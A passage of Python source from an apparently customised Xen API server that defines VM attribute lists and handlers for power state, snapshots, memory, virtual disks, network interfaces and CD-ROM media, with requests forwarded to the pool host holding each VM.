log.debug(task.get_record())
return xen_api_success(task.get_record())
def task_cancel(self, session, task_ref):
return xen_api_error('OPERATION_NOT_ALLOWED')
# def task_get_by_name_label(self, session, name):
# return xen_api_success(XendTaskManager.get_task_by_name(name))
# Xen API: Class VM
# ----------------------------------------------------------------
VM_attr_ro = ['power_state',
'resident_on',
'consoles',
'snapshots',
'VIFs',
'VBDs',
'VTPMs',
'DPCIs',
'DSCSIs',
'media',
'fibers',
'usb_scsi',
'DSCSI_HBAs',
'tools_version',
'domid',
'is_control_domain',
'metrics',
'crash_dumps',
'cpu_pool',
'cpu_qos',
'network_qos',
'VCPUs_CPU',
'ip_addr',
'MAC',
'is_local_vm',
'vnc_location',
'available_vbd_device',
'VIF_record',
'VBD_record',
'dev2path_list',
'pid2devnum_list',
'vbd2device_list',
'config',
'record_lite',
'inner_ip',
'system_VDI',
'network_record',
]
VM_attr_rw = ['name_label',
'name_description',
'user_version',
'is_a_template',
'auto_power_on',
'snapshot_policy',
'memory_dynamic_max',
'memory_dynamic_min',
'memory_static_max',
'memory_static_min',
'VCPUs_max',
'VCPUs_at_startup',
'VCPUs_params',
'actions_after_shutdown',
'actions_after_reboot',
'actions_after_suspend',
'actions_after_crash',
'PV_bootloader',
'PV_kernel',
'PV_ramdisk',
'PV_args',
'PV_bootloader_args',
'HVM_boot_policy',
'HVM_boot_params',
'platform',
'PCI_bus',
'other_config',
'security_label',
'pool_name',
'suspend_VDI',
'suspend_SR',
'VCPUs_affinity',
'tags',
'tag',
'rate',
'all_tag',
'all_rate',
'boot_order',
'IO_rate_limit',
# 'ip_map',
'passwd',
'config',
'platform_serial',
]
VM_methods = [('clone', 'VM'),
('clone_local', 'VM'),
('clone_MAC', 'VM'),
('clone_local_MAC', 'VM'),
('start', None),
('start_on', None),
('snapshot', None),
('rollback', None),
('destroy_snapshot', 'Bool'),
('destroy_all_snapshots', 'Bool'),
('pause', None),
('unpause', None),
('clean_shutdown', None),
('clean_reboot', None),
('hard_shutdown', None),
('hard_reboot', None),
('suspend', None),
('resume', None),
('send_sysrq', None),
('set_VCPUs_number_live', None),
('add_to_HVM_boot_params', None),
('remove_from_HVM_boot_params', None),
('add_to_VCPUs_params', None),
('add_to_VCPUs_params_live', None),
('remove_from_VCPUs_params', None),
('add_to_platform', None),
('remove_from_platform', None),
('add_to_other_config', None),
('remove_from_other_config', None),
('save', None),
('set_memory_dynamic_max_live', None),
('set_memory_dynamic_min_live', None),
('send_trigger', None),
('pool_migrate', None),
('migrate', None),
('destroy', None),
('cpu_pool_migrate', None),
('destroy_local', None),
('destroy_fiber', None),
('destroy_usb_scsi', None),
('destroy_media', None),
('destroy_VIF', None),
('disable_media', None),
('enable_media', None),
('eject_media', None),
('copy_sxp_to_nfs', None),
('media_change', None),
('add_tags', None),
('check_fibers_valid', 'Map'),
('check_usb_scsi_valid', 'Map'),
('can_start','Bool'),
('init_pid2devnum_list', None),
('clear_IO_rate_limit', None),
('clear_pid2devnum_list', None),
('start_set_IO_limit', None),
('start_init_pid2dev', None),
('create_image', 'Bool'),
('send_request_via_serial', 'Bool'),
# ('del_ip_map', None),
]
VM_funcs = [('create', 'VM'),
('create_on', 'VM'),
('create_from_sxp', 'VM'),
('create_from_vmstruct', 'VM'),
('restore', None),
('get_by_name_label', 'Set(VM)'),
('get_all_and_consoles', 'Map'),
('get_lost_vm_by_label', 'Map'),
('get_lost_vm_by_date', 'Map'),
('get_record_lite', 'Set'),
('create_data_VBD', 'Bool'),
('delete_data_VBD', 'Bool'),
('create_from_template', None),
('create_on_from_template', None),
('clone_system_VDI', 'VDI'),
('create_with_VDI', None),
]
# parameters required for _create()
VM_attr_inst = [
'name_label',
'name_description',
'user_version',
'is_a_template',
'is_local_vm',
'memory_static_max',
'memory_dynamic_max',
'memory_dynamic_min',
'memory_static_min',
'VCPUs_max',
'VCPUs_at_startup',
'VCPUs_params',
'actions_after_shutdown',
'actions_after_reboot',
'actions_after_suspend',
'actions_after_crash',
'PV_bootloader',
'PV_kernel',
'PV_ramdisk',
'PV_args',
'PV_bootloader_args',
'HVM_boot_policy',
'HVM_boot_params',
'platform',
'PCI_bus',
'other_config',
'security_label']
def VM_get(self, name, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM attribute value by name.
@param name: name of VM attribute field.
@param session: session of RPC.
@param vm_ref: uuid of VM.
@return: value of field.
@rtype: dict
'''
return xen_api_success(
XendDomain.instance().get_vm_by_uuid(vm_ref).info[name])
def VM_set(self, name, session, vm_ref, value):
'''
@author: wuyuewen
@summary: Set VM attribute value by name.
@param name: name of VM attribute field.
@param session: session of RPC.
@param vm_ref: uuid of VM.
@param value: new value of VM attribute field.
@return: True | False.
@rtype: dict
'''
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
dominfo.info[name] = value
return self._VM_save(dominfo)
def _VM_save(self, dominfo):
'''
@author: wuyuewen
@summary: Call config save function, the struct of VM will save to disk.
@param dominfo: VM config structure.
@return: True | False.
@rtype: dict.
'''
log.debug('VM_save')
XendDomain.instance().managed_config_save(dominfo)
return xen_api_success_void()
# attributes (ro)
def VM_get_power_state(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM power state by uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@return: power state.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_power_state(vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_power_state", vm_ref)
else:
return self._VM_get_power_state(vm_ref)
def _VM_get_power_state(self, vm_ref):
'''
@author: wuyuewen
@summary: Internal method.
@param vm_ref: uuid.
@return: power state.
@rtype: dict.
'''
# log.debug("in get power state")
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_power_state())
# def VM_get_power_state(self, session, vm_ref):
# #host_ref = BNPoolAPI._VM_to_Host[vm_ref]
# host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
# if cmp(host_ref, XendNode.instance().uuid) == 0:
# dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
# return xen_api_success(dom.get_power_state())
# else:
# try:
# remote_ip = BNPoolAPI._host_structs[host_ref]['ip']
# proxy = ServerProxy('http://' + remote_ip + ':9363')
# response = proxy.session.login('root')
# if cmp(response['Status'], 'Failure') == 0:
# return xen_api_error(response['ErrorDescription'])
# session_ref = response['Value']
# return proxy.VM.get_power_state(session_ref, vm_ref)
# except socket.error:
# return xen_api_error('socket error')
def VM_get_resident_on(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM resident Host.
@param session: session of RPC.
@param vm_ref: uuid.
@return: Host uuid.
@rtype: dict.
'''
#host_ref = BNPoolAPI._VM_to_Host[vm_ref]
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
return xen_api_success(host_ref)
def VM_get_snapshots(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM snapshots by uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@return: snapshots.
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_get_vdi_snapshots(session, vdi_ref)
def _VM_get_vdi_snapshots(self, session, vdi_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM snapshots by uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@return: snapshots.
@rtype: dict.
'''
storage = self._get_BNStorageAPI_instance()
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
log.debug('VM_snapshot_vdi>>>>>vdi do not exist...')
return xen_api_success([])
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record("", sr).get('Value')
if not sr_rec:
log.debug('sr record do not exist>>>>>')
return xen_api_success([])
sr_type = sr_rec.get('type')
log.debug('sr type>>>>>>>>>>>>>>>%s' % sr_type)
if cmp(sr_type, 'gpfs') == 0:
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
snapshots = proxy.get_snapshots_gpfs(mount_point, vdi_ref)
elif cmp(sr_type, 'mfs') == 0:
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
snapshots = proxy.get_snapshots_mfs(mount_point, vdi_ref)
elif cmp(sr_type, 'ocfs2') == 0:
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
snapshots = proxy.get_snapshots_ocfs2(mount_point, vdi_ref)
elif cmp(sr_type, 'local_ocfs2') == 0:
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
snapshots = proxy.get_snapshots_ocfs2(mount_point, vdi_ref)
else:
sr_ip = sr_rec['other_config']['location'].split(":")[0]
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
snapshots = proxy.get_snapshots(sr, vdi_ref)
log.debug("snapshots : %s " % snapshots)
return xen_api_success(snapshots)
def VM_get_snapshot_policy(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM snapshot policy by uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@return: snapshot policy.
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_get_vdi_snapshot_policy(session, vdi_ref)
def _VM_get_vdi_snapshot_policy(self, session, vdi_ref):
'''
@author: wuyuewen
@summary: Interal method. Get VM snapshot policy by uuid.
@param session: session of RPC.
@param vdi_ref: VM system VDI's uuid.
@return: snapshot policy.
@rtype: dict.
'''
storage = self._get_BNStorageAPI_instance()
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
log.debug('VM_snapshot_vdi>>>>>vdi do not exist...')
return xen_api_success(False)
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record("", sr).get('Value', None)
if sr_rec:
location = sr_rec['other_config']['location']
sr_type = sr_rec.get('type')
if cmp(sr_type, 'gpfs') == 0 or cmp(sr_type, 'mfs') == 0\
or cmp(sr_type, 'ocfs2') == 0 or cmp(sr_type, 'local_ocfs2') == 0:
proxy = ServerProxy("http://127.0.0.1:10010")
snapshot_policy = proxy.get_snapshot_policy(sr, vdi_ref)
log.debug("snapshot_policy : %s " % snapshot_policy)
else:
sr_ip = location.split(":")[0]
log.debug("sr rec : %s" % sr_rec)
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
snapshot_policy = proxy.get_snapshot_policy(sr, vdi_ref)
log.debug("snapshot_policy : %s " % snapshot_policy)
return xen_api_success(snapshot_policy)
else:
return xen_api_success(("1", "100"))
def VM_set_snapshot_policy(self, session, vm_ref, interval, maxnum):
'''
@author: wuyuewen
@summary: Set VM snapshot policy by uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@param interval: the interval of create a snap, the unit is (day).
@param maxnum: the max number of snapshots keep.
@return: True | False.
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
return self._VM_set_vdi_snapshot_policy(session, vdi_ref, interval, maxnum)
def _VM_set_vdi_snapshot_policy(self, session, vdi_ref, interval, maxnum):
'''
@author: wuyuewen
@summary: Internal method. Set VM snapshot policy by uuid.
@param session: session of RPC.
@param vdi_ref: VM system VDI's uuid.
@param interval: the interval of create a snap, the unit is (day).
@param maxnum: the max number of snapshots keep.
@return: True | False.
@rtype: dict.
'''
storage = self._get_BNStorageAPI_instance()
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
log.debug('VM_snapshot_vdi>>>>>vdi do not exist...')
return xen_api_success(("1", "100"))
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record("", sr).get('Value', None)
if sr_rec:
sr_type = sr_rec.get('type')
if cmp(sr_type, 'gpfs') == 0 or cmp(sr_type, 'mfs') == 0\
or cmp(sr_type, 'ocfs2') == 0 or cmp(sr_type, 'local_ocfs2') == 0:
proxy = ServerProxy("http://127.0.0.1:10010")
snapshot_policy = proxy.set_snapshot_policy(sr, vdi_ref, interval, maxnum)
log.debug("snapshot_policy : %s " % snapshot_policy)
else:
sr_ip = sr_rec['other_config']['location'].split(":")[0]
log.debug("sr rec : %s" % sr_rec)
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
snapshot_policy = proxy.set_snapshot_policy(sr, vdi_ref, interval, maxnum)
log.debug("snapshot_policy : %s " % snapshot_policy)
return xen_api_success(snapshot_policy)
else:
return xen_api_success(("1", "100"))
def VM_get_memory_static_max(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM memory static max.
@param session: session of RPC.
@param vm_ref: uuid.
@return: memory static max.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_memory_static_max(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_get_memory_static_max', vm_ref)
else:
return self._VM_get_memory_static_max(session, vm_ref)
def _VM_get_memory_static_max(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM memory static max.
@param session: session of RPC.
@param vm_ref: uuid.
@return: memory static max.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_memory_static_max())
def VM_get_memory_static_min(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM memory static min.
@param session: session of RPC.
@param vm_ref: uuid.
@return: memory static min.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_memory_static_min(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_get_memory_static_min', vm_ref)
else:
return self._VM_get_memory_static_min(session, vm_ref)
def _VM_get_memory_static_min(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM memory static max.
@param session: session of RPC.
@param vm_ref: uuid.
@return: memory static min.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_memory_static_min())
def VM_get_VIFs(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM VIFs.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VIFs.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_VIFs(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_VIFs", vm_ref)
else:
return self._VM_get_VIFs(session, vm_ref)
def _VM_get_VIFs(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM VIFs.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VIFs.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_vifs())
def VM_get_VBDs(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM VBDs.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_VBDs(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_VBDs", vm_ref)
else:
return self._VM_get_VBDs(session, vm_ref)
def _VM_get_VBDs(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM VBDs.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_vbds())
def VM_get_usb_scsi(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM usb scsi devices(VBD), the backend is /dev/XXX.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_usb_scsi(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_usb_scsi", vm_ref)
else:
return self._VM_get_usb_scsi(session, vm_ref)
def _VM_get_usb_scsi(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM usb scsi devices(VBD), the backend is /dev/XXX.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
vbds = dom.get_vbds()
result = []
for vbd in vbds:
vbd_type = self.VBD_get_type(session, vbd).get('Value', "")
if cmp(vbd_type, XEN_API_VBD_TYPE[3]) == 0:
#log.debug('fibers: %s' % vbd)
result.append(vbd)
return xen_api_success(result)
def VM_get_fibers(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM fiber devices(VBD), the backend is /dev/XXX.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_fibers(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_fibers", vm_ref)
else:
return self._VM_get_fibers(session, vm_ref)
def _VM_get_fibers(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM fiber devices(VBD), the backend is /dev/XXX.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
vbds = dom.get_vbds()
result = []
for vbd in vbds:
vbd_type = self.VBD_get_type(session, vbd).get('Value', "")
if cmp(vbd_type, XEN_API_VBD_TYPE[2]) == 0:
#log.debug('fibers: %s' % vbd)
result.append(vbd)
return xen_api_success(result)
def VM_destroy_usb_scsi(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Destroy VM usb scsi device(VBD) by vbd uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise VDIError: Cannot destroy VDI with VBDs attached
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_destroy_usb_scsi(session, vm_ref, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_destroy_usb_scsi", vm_ref, vbd_ref)
else:
return self._VM_destroy_usb_scsi(session, vm_ref, vbd_ref)
def _VM_destroy_usb_scsi(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Internal method. Destroy VM usb scsi device(VBD) by vbd uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise VDIError: Cannot destroy VDI with VBDs attached
'''
storage = self._get_BNStorageAPI_instance()
vdi_ref = self.VBD_get_VDI(session, vbd_ref).get('Value')
response = self.VBD_destroy(session, vbd_ref)
if vdi_ref:
storage.VDI_destroy(session, vdi_ref)
return response
def VM_destroy_fiber(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Destroy VM fiber device(VBD) by vbd uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise VDIError: Cannot destroy VDI with VBDs attached
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_destroy_fiber(session, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_destroy_fiber", vm_ref, vbd_ref)
else:
return self._VM_destroy_fiber(session, vbd_ref)
def _VM_destroy_fiber(self, session, vbd_ref):
'''
@author: wuyuewen
@summary: Internal method. Destroy VM fiber device(VBD) by vbd uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise VDIError: Cannot destroy VDI with VBDs attached
'''
storage = self._get_BNStorageAPI_instance()
vdi_ref = self.VBD_get_VDI(session, vbd_ref).get('Value')
response = self.VBD_destroy(session, vbd_ref)
if vdi_ref:
storage.VDI_destroy(session, vdi_ref)
return response
def VM_enable_media(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Enable VM's media device(cdrom device).
@precondition: VM not running
@param session: session of RPC.
@param vm_ref: uuid.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_enable_media(session, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_enable_media", vbd_ref)
else:
return self._VM_enable_media(session, vbd_ref)
def _VM_enable_media(self, session, vbd_ref):
'''
@author: wuyuewen
@summary: Internal method. Enable VM's media device(cdrom device).
@precondition: VM not running
@param session: session of RPC.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
'''
response = self.VBD_set_bootable(session, vbd_ref, 1)
return response
def VM_disable_media(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Disable VM's media device(cdrom device).
@precondition: VM not running
@param session: session of RPC.
@param vm_ref: uuid.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_disable_media(session, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_disable_media", vbd_ref)
else:
return self._VM_disable_media(session, vbd_ref)
def _VM_disable_media(self, session, vbd_ref):
'''
@author: wuyuewen
@summary: Internal method. Disable VM's media device(cdrom device).
@precondition: VM not running
@param session: session of RPC.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
'''
response = self.VBD_set_bootable(session, vbd_ref, 0)
return response
def VM_eject_media(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Eject VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_eject_media(session, vm_ref, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_eject_media", vm_ref, vbd_ref)
else:
return self._VM_eject_media(session, vm_ref, vbd_ref)
def _VM_eject_media(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Internal method. Eject VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
node = XendNode.instance()
if not node.is_fake_media_exists():
self._fake_media_auto_create(session)
# if not os.path.exists(FAKE_MEDIA_PATH):
# os.system("touch %s" % FAKE_MEDIA_PATH)
response = self._VM_media_change(session, vm_ref, FAKE_MEDIA_NAME)
return response
def VM_destroy_media(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Destroy VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_destroy_media(session, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_destroy_media", vm_ref, vbd_ref)
else:
return self._VM_destroy_media(session, vbd_ref)
def _VM_destroy_media(self, session, vbd_ref):
'''
@author: wuyuewen
@summary: Destroy VM's media device(cdrom device).
@param session: session of RPC.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
response = self.VBD_destroy(session, vbd_ref)
return response
def VM_destroy_VIF(self, session, vm_ref, vif_ref):
'''
@author: wuyuewen
@summary: Destroy VM's VIF device(network device).
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_destroy_VIF(session, vm_ref, vif_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_destroy_VIF", vm_ref, vif_ref)
else:
return self._VM_destroy_VIF(session, vm_ref, vif_ref)
def _VM_destroy_VIF(self, session, vm_ref, vif_ref):
'''
@author: wuyuewen
@summary: Internal method. Destroy VM's VIF device(network device).
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
# self._VM_del_ip_map(session, vm_ref, vif_ref)
response = self.VIF_destroy(session, vif_ref)
return response
def VM_get_available_vbd_device(self, session, vm_ref, device_type = 'xvd'):
'''
@author: wuyuewen
@summary: Use at pre-create of VBD device, return the device name(xvdX/hdX) that can use.
@precondition: The available interval is xvda-xvdj/hda-hdj, limit total 10 devices.
@param session: session of RPC.
@param vm_ref: uuid
@param device_type: xvd/hd.
@return: available device name.
@rtype: dict.
@raise xen_api_error: DEVICE_OUT_OF_RANGE, NO_VBD_ERROR
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_available_vbd_device(session, vm_ref, device_type)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_available_vbd_device", vm_ref, device_type)
else:
return self._VM_get_available_vbd_device(session, vm_ref, device_type)
def _VM_get_available_vbd_device(self, session, vm_ref, device_type):
'''
@author: wuyuewen
@summary: Internal method. Use at pre-create of VBD device, return the device name(xvdX/hdX) that can use.
@precondition: The available interval is xvda-xvdj/hda-hdj, limit total 10 devices.
@param session: session of RPC.
@param vm_ref: uuid
@param device_type: xvd/hd.
@return: available device name.
@rtype: dict.
@raise xen_api_error: DEVICE_OUT_OF_RANGE, NO_VBD_ERROR
'''
vbds = self._VM_get_VBDs(session, vm_ref).get('Value')
if vbds:
if cmp(len(vbds), DISK_LIMIT+1) >= 0:
return xen_api_error(['DEVICE_OUT_OF_RANGE', 'VBD'])
vbds_first_device = self.VBD_get_device(session, vbds[0]).get('Value')
if vbds_first_device.startswith('hd'):
device_list = copy.deepcopy(VBD_DEFAULT_DEVICE)
else:
device_list = copy.deepcopy(VBD_XEN_DEFAULT_DEVICE)
for vbd in vbds:
device = self.VBD_get_device(session, vbd).get('Value')
if device and device in device_list:
device_list.remove(device)
else:
continue
if device_list:
return xen_api_success(device_list[0])
else:
return xen_api_error(['DEVICE_OUT_OF_RANGE', 'VBD'])
else:
return xen_api_error(['NO_VBD_ERROR', 'VM', vm_ref])
def VM_get_media(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@return: VBD
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_media(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_media", vm_ref)
else:
return self._VM_get_media(session, vm_ref)
def _VM_get_media(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@return: VBD
@rtype: dict.
'''
storage = self._get_BNStorageAPI_instance()
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
vbds = dom.get_vbds()
result = None
for vbd in vbds:
vbd_type = self.VBD_get_type(session, vbd).get('Value', "<none/>")
if cmp(vbd_type, XEN_API_VBD_TYPE[0]) == 0:
result = vbd
break
if result:
return xen_api_success(result)
else:
'''
if VM has no media device, create a fake one.
'''
vbd_struct = CD_VBD_DEFAULT_STRUCT
vbd_struct["VM"] = vm_ref
node = XendNode.instance()
if not node.is_fake_media_exists():
vdi = storage._fake_media_auto_create(session).get('Value')
else:
vdi = storage._VDI_get_by_name_label(session, FAKE_MEDIA_NAME).get("Value")
vbd_struct["VDI"] = vdi
